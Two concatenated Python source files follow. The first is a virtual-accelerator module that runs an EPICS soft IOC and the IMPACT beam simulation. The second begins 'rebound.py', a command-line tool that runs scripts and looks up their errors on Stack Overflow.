va.append_rw(self._findChannel(elem.name, elem.fields.gradient, "setpoint"),
self._findChannel(elem.name, elem.fields.gradient, "readset"),
self._findChannel(elem.name, elem.fields.gradient, "readback"),
(elem.name, elem.fields.gradient), desc="Quadrupole Gradient",
egu="T/m") # , drvratio=0.10)
va.append_elem(elem)
elif isinstance(elem, SextElement):
_LOGGER.warning("VirtAccelFactory: Hexapole magnet element support not implemented. Ignoring channels.")
# va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
# self._findChannel(elem.name, elem.fields.field, "readset"),
# self._findChannel(elem.name, elem.fields.field, "readback"),
# (elem.name, elem.fields.field), desc="Hexapole Field", egu="T/m^2", drvrel=0.05)
# va.append_elem(elem)
elif isinstance(elem, BPMElement):
va.append_ro(self._findChannel(elem.name, elem.fields.x, "readback"),
(elem.name, elem.fields.x), desc="Horizontal Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.y, "readback"),
(elem.name, elem.fields.y), desc="Vertical Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.phase, "readback"),
(elem.name, elem.fields.phase), desc="Beam Phase", egu="degree")
va.append_ro(self._findChannel(elem.name, elem.fields.energy, "readback"),
(elem.name, elem.fields.energy), desc="Beam Energy", egu="MeV")
va.append_elem(elem)
elif isinstance(elem, PMElement):
va.append_ro(self._findChannel(elem.name, elem.fields.x, "readback"),
(elem.name, elem.fields.x), desc="Horizontal Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.y, "readback"),
(elem.name, elem.fields.y), desc="Vertical Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.xrms, "readback"),
(elem.name, elem.fields.xrms), desc="Horizontal Size", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.yrms, "readback"),
(elem.name, elem.fields.yrms), desc="Vertical Size", egu="m")
va.append_elem(elem)
elif isinstance(elem, (BLMElement, BLElement, BCMElement)):
# ignore these diagnostic elements for now
pass
elif isinstance(elem, (ValveElement, PortElement, StripElement)):
# ignore these elements with no relevant channels
pass
elif isinstance(elem, DriftElement):
# drift elements have no channels
pass
else:
raise RuntimeError("Unsupported element type: {}".format(type(elem).__name__))
return va
class VirtualAccelerator(object):
"""VirtualAccelerator executes and manages the
EPICS IOC process and IMPACT simulation process.
"""
def __init__(self, latfactory, settings, chanprefix, impact_exe, data_dir, work_dir=None):
if not isinstance(latfactory, LatticeFactory):
raise TypeError("VirtualAccelerator: Invalid type for LatticeFactory")
self._latfactory = latfactory
if not isinstance(settings, dict):
raise TypeError("VirtualAccelerator: Invalid type for accelerator Settings")
self._settings = settings
self._chanprefix = chanprefix
self.impact_exe = impact_exe
self.data_dir = data_dir
self.work_dir = work_dir
self._epicsdb = []
self._csetmap = OrderedDict()
self._elemmap = OrderedDict()
self._fieldmap = OrderedDict()
self._readfieldmap = OrderedDict()
self._noise = 0.001
self._started = False
self._continue = False
self._rm_work_dir = False
self._ioc_process = None
self._ioc_logfile = None
self._subscriptions = None
self._lock = cothread.Event(False)
@property
def impact_exe(self):
return self._impact_exe
@impact_exe.setter
def impact_exe(self, impact_exe):
if not isinstance(impact_exe, str):
raise TypeError("VirtualAccelerator: 'impact_exe' property much be type string")
self._impact_exe = impact_exe
@property
def data_dir(self):
return self._data_dir
@data_dir.setter
def data_dir(self, data_dir):
if not isinstance(data_dir, str):
raise TypeError("VirtualAccelerator: 'data_dir' property much be type string")
self._data_dir = data_dir
@property
def work_dir(self):
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
if (work_dir is not None) and not isinstance(work_dir, str):
raise TypeError("VirtualAccelerator: 'work_dir' property much be type string or None")
self._work_dir = work_dir
def append_rw(self, cset, rset, read, field, desc="Element", egu="", prec=5, drvh=None, drvl=None, drvabs=None,
drvrel=None, drvratio=None):
"""Append a set of read/write channels to this virtual accelerator.
The algorithm to set EPICS DRVH/DRVL is as follows:
- if absolute limit (drvabs) is given, use absolute
- or if relative limit (drvrel) is given, use relative
- or if a ratio (drvratio) is given, use ratio
- otherwise, no limit.
:param cset: pv name of set point
:param rset: pv name of read back for set point
:param read: pv name of read back
:param field: tuple with element name and field
:param desc: element description
:param egu: EPICS record engineering unit
:param prec: EPICS display precision
:param drvabs: absolute driven limit with +-abs(drvabs)
:param drvrel: relative driven limit, value +- abs(drvrel)
:param drvratio: driven limit as a ratio of the set point value, i.e. value * (1 +- drvratio)
"""
if self.is_started():
raise RuntimeError("VirtualAccelerator: Cannot append RW channel when started")
val = self._settings[field[0]][field[1]]
if drvabs is not None:
drvh = abs(drvabs)
drvl = - abs(drvabs)
elif drvrel is not None:
drvh = val + abs(drvrel)
drvl = val - abs(drvrel)
elif drvratio is not None:
drvh = val + abs(val * drvratio)
drvl = val - abs(val * drvratio)
self._epicsdb.append(("ao", cset, OrderedDict([
("DESC", "{} Set Point".format(desc)),
("VAL", val),
("DRVH", drvh),
("DRVL", drvl),
("PREC", prec),
("EGU", egu)
])))
self._epicsdb.append(("ai", rset, OrderedDict([
("DESC", "{} Set Point Read Back".format(desc)),
("VAL", val),
("PREC", prec),
("EGU", egu)
])))
self._epicsdb.append(("ai", read, OrderedDict([
("DESC", "{} Read Back"),
("VAL", val),
("PREC", prec),
("EGU", egu)
])))
self._csetmap[cset] = (rset, read)
self._fieldmap[cset] = field
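# Illustrative example of the drive-limit algorithm above (values are made up):
# with a current setting of val = 10.0,
#   drvabs=2.0   -> DRVH = 2.0,  DRVL = -2.0   (absolute, independent of val)
#   drvrel=2.0   -> DRVH = 12.0, DRVL = 8.0
#   drvratio=0.1 -> DRVH = 11.0, DRVL = 9.0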
def append_ro(self, read, field, desc="Element", egu="", prec=5):
"""Append a read-only channel to this virtual accelerator.
:param read: pv name of read back
:param field: tuple with element name and field
:param desc: element description
:param egu: EPICS record engineering unit
:param prec: EPICS display precision
"""
if self.is_started():
raise RuntimeError("VirtualAccelerator: Cannot append RO channel when started")
self._epicsdb.append(("ai", read, OrderedDict([
("DESC", "{} Read Back".format(desc)),
("VAL", "0.0"),
("PREC", prec),
("EGU", egu)
])))
if field[0] not in self._readfieldmap:
self._readfieldmap[field[0]] = OrderedDict()
self._readfieldmap[field[0]][field[1]] = read
def append_elem(self, elem):
"""Append an accelerator element to this virtual accelerator.
"""
if self.is_started():
raise RuntimeError("VirtualAccelerator: Cannot append element when started")
self._elemmap[elem.name] = elem
def is_started(self):
"""Check is virtual accelerator has been started."""
return self._started
def start(self, raise_on_wait=False):
"""Start the virtual accelerator. Spawn a new cothread to handle execution.
"""
_LOGGER.debug("VirtualAccelerator: Start")
cothread.Spawn(self._starter, raise_on_wait, raise_on_wait=True).Wait()
def _starter(self, raise_on_wait):
_LOGGER.debug("VirtualAccelerator: Start (cothread)")
if self._started:
raise RuntimeError("VirtualAccelerator: Already started")
if not os.path.isdir(self.data_dir):
raise RuntimeError("VirtualAccelerator: Data directory not found: {}".format(self.data_dir))
if self.work_dir is not None and os.path.exists(self.work_dir):
raise RuntimeError("VirtualAccelerator: Working directory already exists: {}".format(self.work_dir))
self._started = True
self._continue = True
self._executer = cothread.Spawn(self._executer, raise_on_wait=raise_on_wait)
def stop(self):
"""Stop the virtual accelerator.
Spawn a new cothread to stop gracefully.
"""
_LOGGER.debug("VirtualAccelerator: Stop")
cothread.Spawn(self._stopper, raise_on_wait=True).Wait()
def _stopper(self):
_LOGGER.debug("VirtualAccelerator: Stop (cothread)")
if self._started:
_LOGGER.debug("VirtualAccelerator: Initiate shutdown")
self._continue = False
# self._executer.Wait()
def wait(self, timeout=None):
"""Wait for the virtual accelerator to stop
"""
if self._started:
self._executer.Wait(timeout)
def _executer(self):
"""Executer method wraps the call to _execute and ensure that
the proper clean up of connections and processes.
"""
_LOGGER.debug("VirtualAccelerator: Execute (cothread)")
try:
self._execute()
finally:
_LOGGER.info("VirtualAccelerator: Cleanup")
if self._subscriptions is not None:
_LOGGER.debug("VirtualAccelerator: Cleanup: close connections")
for sub in self._subscriptions:
sub.close()
self._subscriptions = None
if self._ioc_process is not None:
_LOGGER.debug("VirtualAccelerator: Cleanup: terminate IOC process")
self._ioc_process.terminate()
self._ioc_process.wait()
self._ioc_process = None
if self._ioc_logfile is not None:
_LOGGER.debug("VirtualAccelerator: Cleanup: close IOC log file")
self._ioc_logfile.close()
self._ioc_logfile = None
if self._rm_work_dir:
_LOGGER.debug("VirtualAccelerator: Cleanup: remove work directory")
shutil.rmtree(self.work_dir)
self._executer = None
self._continue = False
self._started = False
def _execute(self):
"""Execute the virtual accelerator. This includes the following:
1. Creating a temporary working directory for execution of IMPACT.
2. Set up the working directory by symlinking from the data directory.
3. Writing the EPICS DB to the working directory (va.db).
4. Starting the softIoc and initializing the channel monitors.
5. Add noise to the settings for all input (CSET) channels.
6. Generate the IMPACT lattice file in working directory (test.in).
7. Execute IMPACT simulation and read the output files (fort.??).
8. Update the READ channels of all devices.
9. Update the RSET channels of input devices.
10. Repeat from step #5.
"""
_LOGGER.debug("VirtualAccelerator: Execute virtual accelerator")
if self._chanprefix is None:
chanprefix = ""
else:
chanprefix = self._chanprefix
# Add channel for sample counting
sample_cnt = chanprefix + "SVR:CNT"
self._epicsdb.append(("ai", sample_cnt, OrderedDict([
("DESC", "Sample counter for scan client"),
("VAL", 0)
])))
# Add channel for VA configuration and control
channoise = chanprefix + "SVR:NOISE"
self._epicsdb.append(("ao", channoise, OrderedDict([
("DESC", "Noise level of Virtual Accelerator"),
("VAL", 0.001),
("PREC", 5)
])))
chanstat = chanprefix + "SVR:STATUS"
self._epicsdb.append(("bi", chanstat, OrderedDict([
("DESC", "Status of Virtual Accelerator"),
("VAL", 1),
("ZNAM", "ERR"),
("ONAM", "OK"),
("PINI", "1")
])))
chancharge = chanprefix + "SVR:CHARGE"
self._epicsdb.append(("ai", chancharge, OrderedDict([
("DESC", "Q/M of Virtual Accelerator"),
("VAL", 0.0),
("PREC", 5)
])))
if self.work_dir is not None:
os.makedirs(self.work_dir)
self._rm_work_dir = False
else:
self.work_dir = tempfile.mkdtemp(_TEMP_DIRECTORY_SUFFIX)
self._rm_work_dir = True
_LOGGER.info("VirtualAccelerator: Working directory: %s", self._work_dir)
# input file paths
epicsdbpath = os.path.join(self.work_dir, "va.db")
latticepath = os.path.join(self.work_dir, "test.in")
modelmappath = os.path.join(self.work_dir, "model.map")
# output file paths
fort18path = os.path.join(self.work_dir, "fort.18")
fort24path = os.path.join(self.work_dir, "fort.24")
fort25path = os.path.join(self.work_dir, "fort.25")
epicslogpath = os.path.join(self.work_dir, "softioc.log")
if os.path.isabs(self.data_dir):
abs_data_dir = self.data_dir
else:
abs_data_dir = os.path.abspath(self.data_dir)
for datafile in os.listdir(abs_data_dir):
srcpath = os.path.join(abs_data_dir, datafile)
destpath = os.path.join(self.work_dir, datafile)
if os.path.isfile(os.path.join(abs_data_dir, datafile)):
os.symlink(srcpath, destpath)
_LOGGER.debug("VirtualAccelerator: Link data file %s to %s", srcpath, destpath)
with open(epicsdbpath, "w") as outfile:
self._write_epicsdb(outfile)
self._ioc_logfile = open(epicslogpath, "w")
self._ioc_process = _Cothread_Popen(["softIoc", "-d", "va.db"], cwd=self.work_dir,
stdout=self._ioc_logfile, stderr=subprocess.STDOUT)
self._subscriptions = []
self._subscriptions.append(catools.camonitor(channoise, self._handle_noise_monitor))
self._subscriptions.extend(catools.camonitor(self._csetmap.keys(), self._handle_cset_monitor))
while self._continue:
# update the RSET channels with new settings
for cset in self._csetmap.items():
name, field = self._fieldmap[cset[0]]
catools.caput(cset[1][0], self._settings[name][field])
settings = self._copy_settings_with_noise()
self._latfactory.settings = settings
lattice = self._latfactory.build()
catools.caput(chancharge, lattice.initialCharge)
with open(latticepath, "w") as outfile:
with open(modelmappath, "w") as mapfile:
lattice.write(outfile, mapstream=mapfile)
start = time.time()
if os.path.isfile(fort18path):
os.remove(fort18path)
if os.path.isfile(fort24path):
os.remove(fort24path)
if os.path.isfile(fort25path):
os.remove(fort25path)
impact_process = _Cothread_Popen(["mpirun", "-np", str(lattice.nprocessors),
str(self.impact_exe)], cwd=self.work_dir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
(stdout, _, status) = impact_process.communicate()
# The virtual accelerator shutdown is likely to occur while IMPACT is executing,
# so check if virtual accelerator has been stopped before proceeding.
if not self._continue:
break
_LOGGER.info("VirtualAccelerator: IMPACT execution time: %f s", time.time() - start)
if status == 0:
catools.caput(chanstat, _VA_STATUS_GOOD)
else:
_LOGGER.warning("VirtualAccelerator: IMPACT exited with non-zero status code: %s\r\n%s", status, stdout)
catools.caput(chanstat, _VA_STATUS_BAD)
if os.path.isfile(fort18path):
fort18 = numpy.loadtxt(fort18path, usecols=(0, 1, 3))
fort18length = fort18.shape[0]
else:
_LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort18path)
catools.caput(chanstat, _VA_STATUS_BAD)
fort18length = 0
if os.path.isfile(fort24path):
fort24 = numpy.loadtxt(fort24path, usecols=(1, 2))
fort24length = fort24.shape[0]
else:
_LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort24path)
catools.caput(chanstat, _VA_STATUS_BAD)
fort24length = 0
if os.path.isfile(fort25path):
fort25 = numpy.loadtxt(fort25path, usecols=(1, 2))
fort25length = fort25.shape[0]
else:
_LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort25path)
catools.caput(chanstat, _VA_STATUS_BAD)
fort25length = 0
output_map = []
for elem in lattice.elements:
if elem.itype in [-28]:
output_map.append(elem.name)
output_length = len(output_map)
if fort18length < output_length:
_LOGGER.warning("VirtualAccelerator: IMPACT fort.18 length %s, expecting %s",
fort18length, output_length)
catools.caput(chanstat, _VA_STATUS_BAD)
if fort24length < output_length:
_LOGGER.warning("VirtualAccelerator: IMPACT fort.24 length %s, expecting %s",
fort24length, output_length)
catools.caput(chanstat, _VA_STATUS_BAD)
if fort25length < output_length:
_LOGGER.warning("VirtualAccelerator: IMPACT fort.25 length %s, expecting %s",
fort25length, output_length)
catools.caput(chanstat, _VA_STATUS_BAD)
def get_phase(idx):
# IMPACT computes the phase in radians,
# need to convert to degrees for PV.
return _normalize_phase(2.0 * fort18[idx, 1] * (180.0 / math.pi))
for idx in range(min(fort18length, fort24length, fort25length)):
elem = self._elemmap[output_map[idx]]
if isinstance(elem, BPMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.phase], get_phase(idx))
catools.caput(self._readfieldmap[elem.name][elem.fields.phase], get_phase(idx))
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.energy], fort18[idx, 2])
catools.caput(self._readfieldmap[elem.name][elem.fields.energy], fort18[idx, 2])
elif isinstance(elem, PMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.xrms], fort24[idx, 1])
catools.caput(self._readfieldmap[elem.name][elem.fields.xrms], fort24[idx, 1])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.yrms], fort25[idx, 1])
catools.caput(self._readfieldmap[elem.name][elem.fields.yrms], fort25[idx, 1])
else:
_LOGGER.warning("VirtualAccelerator: Output from element type not supported: %s",
type(elem).__name__)
# Write the default error value to the remaining output PVs.
for idx in range(min(fort18length, fort24length, fort25length), output_length):
elem = self._elemmap[output_map[idx]]
if isinstance(elem, BPMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.phase], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.phase], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.energy], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.energy], _DEFAULT_ERROR_VALUE)
elif isinstance(elem, PMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.xrms], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.xrms], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.yrms], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.yrms], _DEFAULT_ERROR_VALUE)
else:
_LOGGER.warning("VirtualAccelerator: Output from element type not supported: %s",
type(elem).__name__)
# Allow the BPM, PM, etc. readbacks to update
# before the device setting readbacks PVs.
cothread.Yield()
for name, value in self._csetmap.items():
name, field = self._fieldmap[name]
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s", value[1], settings[name][field])
catools.caput(value[1], settings[name][field])
# Sleep for a fraction (10%) of the total execution time
# when one simulation costs more than 0.50 seconds.
# Otherwise, sleep for the rest of 1 second.
# If a scan is being done on this virtual accelerator,
# then the scan server has a period of time to update
# setpoints before the next run of IMPACT.
if (time.time() - start) > 0.50:
cothread.Sleep((time.time() - start) * 0.1)
else:
cothread.Sleep(1.0 - (time.time() - start))
def _handle_cset_monitor(self, value, idx):
"""Handle updates of CSET channels by updating
the corresponding setting and RSET channel.
"""
cset = list(self._csetmap.items())[idx]
_LOGGER.debug("VirtualAccelerator: Update cset: '%s' to %s", cset[0], value)
name, field = self._fieldmap[cset[0]]
self._settings[name][field] = float(value)
def _handle_noise_monitor(self, value):
"""Handle updates of the NOISE channel.
"""
_LOGGER.debug("VirtualAccelerator: Update noise: %s", value)
self._noise = float(value)
def _copy_settings_with_noise(self):
s = deepcopy(self._settings)
for name, field in self._fieldmap.values():
s[name][field] = s[name][field] + s[name][field] * self._noise * 2.0 * (random.random() - 0.5)
return s
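# Note: the expression above scales each setting by a uniform random factor in
# [1 - noise, 1 + noise], i.e. a relative error of at most +/- 'noise' around the nominal value.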
def _write_epicsdb(self, buf):
for record in self._epicsdb:
buf.write("record({}, \"{}\") {{\r\n".format(record[0], record[1]))
for name, value in record[2].items():
if value is None:
pass # ignore fields with value None
elif isinstance(value, int):
buf.write(" field(\"{}\", {})\r\n".format(name, value))
elif isinstance(value, float):
buf.write(" field(\"{}\", {})\r\n".format(name, value))
else:
buf.write(" field(\"{}\", \"{}\")\r\n".format(name, value))
buf.write("}\r\n\r\n")
def _normalize_phase(phase):
while phase >= 360.0:
phase -= 360.0
while phase < 0.0:
phase += 360.0
return phase
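# Worked examples of the wrap-around above: _normalize_phase(400.0) -> 40.0,
# _normalize_phase(-30.0) -> 330.0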
class _Cothread_Popen(object):
"""A helpful wrapper class that integrates the python
standard popen() method with the Cothread library.
"""
def __init__(self, *args, **kwargs):
self._process = subprocess.Popen(*args, **kwargs)
self._output = None
self._event = None
def communicate(self, input=None): # @ReservedAssignment
"""Start a real OS thread to wait for process communication.
"""
if self._event is None:
self._event = cothread.Event()
threading.Thread(target=self._communicate_thread, args=(input,)).start()
elif input is not None:
raise RuntimeError("_Cothread_Popen: Communicate method already called")
self._event.Wait()
return (self._output[0], self._output[1], self._process.poll())
def _communicate_thread(self, input): # @ReservedAssignment
"""Executes in separate OS thread. Wait for communication
then return the output to the cothread context.
"""
output = self._process.communicate(input)
cothread.Callback(self._communicate_callback, output)
def _communicate_callback(self, output):
"""Record the output and then signal other cothreads.
"""
self._output = output
self._event.Signal()
def wait(self):
"""Wait for the process to complete and result the exit code.
"""
self.communicate()
return self._process.poll()
def terminate(self):
"""Send the terminate signal. See subprocess.Popen.terminate()
"""
self._process.terminate()
def kill(self):
"""Send the kill signal. See subprocess.Popen.kill()
"""
self._process.kill()
|
rebound.py
|
##########
## GLOBALS
##########
import urwid
import re
import sys
import os
from bs4 import BeautifulSoup
import requests
from queue import Queue
from subprocess import PIPE, Popen
from threading import Thread
import webbrowser
import time
from urwid.widget import (BOX, FLOW, FIXED)
import random
SO_URL = "https://stackoverflow.com"
# ASCII color codes
GREEN = '\033[92m'
GRAY = '\033[90m'
CYAN = '\033[36m'
RED = '\033[31m'
YELLOW = '\033[33m'
END = '\033[0m'
UNDERLINE = '\033[4m'
BOLD = '\033[1m'
# Scroll actions
SCROLL_LINE_UP = "line up"
SCROLL_LINE_DOWN = "line down"
SCROLL_PAGE_UP = "page up"
SCROLL_PAGE_DOWN = "page down"
SCROLL_TO_TOP = "to top"
SCROLL_TO_END = "to end"
# Scrollbar positions
SCROLLBAR_LEFT = "left"
SCROLLBAR_RIGHT = "right"
USER_AGENTS = [
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Firefox/59",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
]
##################
## FILE ATTRIBUTES
##################
def get_language(file_path):
"""Returns the language a file is written in."""
if file_path.endswith(".py"):
return "python3"
elif file_path.endswith(".js"):
return "node"
elif file_path.endswith(".go"):
return "go run"
elif file_path.endswith(".rb"):
return "ruby"
elif file_path.endswith(".java"):
return 'javac' # Compile Java Source File
elif file_path.endswith(".class"):
return 'java' # Run Java Class File
else:
return '' # Unknown language
def get_error_message(error, language):
"""Filters the stack trace from stderr and returns only the error message."""
if error == '':
return None
elif language == "python3":
if any(e in error for e in ["KeyboardInterrupt", "SystemExit", "GeneratorExit"]): # Non-compiler errors
return None
else:
return error.split('\n')[-2].strip()
elif language == "node":
return error.split('\n')[4][1:]
elif language == "go run":
return error.split('\n')[1].split(": ", 1)[1][1:]
elif language == "ruby":
error_message = error.split('\n')[0]
return error_message[error_message.rfind(": ") + 2:]
elif language == "javac":
m = re.search(r'.*error:(.*)', error.split('\n')[0])
return m.group(1) if m else None
elif language == "java":
for line in error.split('\n'):
# Multiple error formats
m = re.search(r'.*(Exception|Error):(.*)', line)
if m and m.group(2):
return m.group(2)
m = re.search(r'Exception in thread ".*" (.*)', line)
if m and m.group(1):
return m.group(1)
return None
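# Illustrative example (hypothetical traceback): for language "python3", a captured
# stderr ending in
#   Traceback (most recent call last):
#     ...
#   NameError: name 'foo' is not defined
# yields "NameError: name 'foo' is not defined", i.e. the last non-empty line
# (assuming the captured stderr ends with a trailing newline).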
#################
## FILE EXECUTION
#################
## Helper Functions ##
def read(pipe, funcs):
"""Reads and pushes piped output to a shared queue and appropriate lists."""
for line in iter(pipe.readline, b''):
for func in funcs:
func(line.decode("utf-8"))
pipe.close()
def write(get):
"""Pulls output from shared queue and prints to terminal."""
for line in iter(get, None):
print(line)
## Main ##
def execute(command):
"""Executes a given command and clones stdout/err to both variables and the
terminal (in real-time)."""
process = Popen(
command,
cwd=None,
shell=False,
close_fds=True,
stdout=PIPE,
stderr=PIPE,
bufsize=1
)
output, errors = [], []
pipe_queue = Queue() # Wowee, thanks CS 225
# Threads for reading stdout and stderr pipes and pushing to a shared queue
stdout_thread = Thread(target=read, args=(process.stdout, [pipe_queue.put, output.append]))
stderr_thread = Thread(target=read, args=(process.stderr, [pipe_queue.put, errors.append]))
writer_thread = Thread(target=write, args=(pipe_queue.get,)) # Thread for printing items in the queue
# Spawns each thread
for thread in (stdout_thread, stderr_thread, writer_thread):
thread.daemon = True
thread.start()
process.wait()
for thread in (stdout_thread, stderr_thread):
thread.join()
pipe_queue.put(None)
output = ' '.join(output)
errors = ' '.join(errors)
if "java" != command[0] and not os.path.isfile(command[1]): # File doesn't exist, for java, command[1] is a class name instead of a file
return (None, None)
else:
return (output, errors)
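# A minimal usage sketch (the file name is hypothetical):
#   output, errors = execute(["python3", "buggy_script.py"])
# 'output' and 'errors' hold the captured stdout/stderr lines joined into single
# strings, while the same text is echoed to the terminal in real time.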
###############
## WEB SCRAPING
###############
## Helper Functions ##
def stylize_code(soup):
"""Identifies and stylizes code in a question or answer."""
# TODO: Handle blockquotes and markdown
stylized_text = []
code_blocks = [block.get_text() for block in soup.find_all("code")]
blockquotes = [block.get_text() for block in soup.find_all("blockquote")]
newline = False
for child in soup.recursiveChildGenerator():
name = getattr(child, "name", None)
if name is None: # Leaf (terminal) node
if child in code_blocks:
if newline: # Code block
#if code_blocks.index(child) == len(code_blocks) - 1: # Last code block
#child = child[:-1]
stylized_text.append(("code", u"\n%s" % str(child)))
newline = False
else: # In-line code
stylized_text.append(("code", u"%s" % str(child)))
else: # Plaintext
newline = child.endswith('\n')
stylized_text.append(u"%s" % str(child))
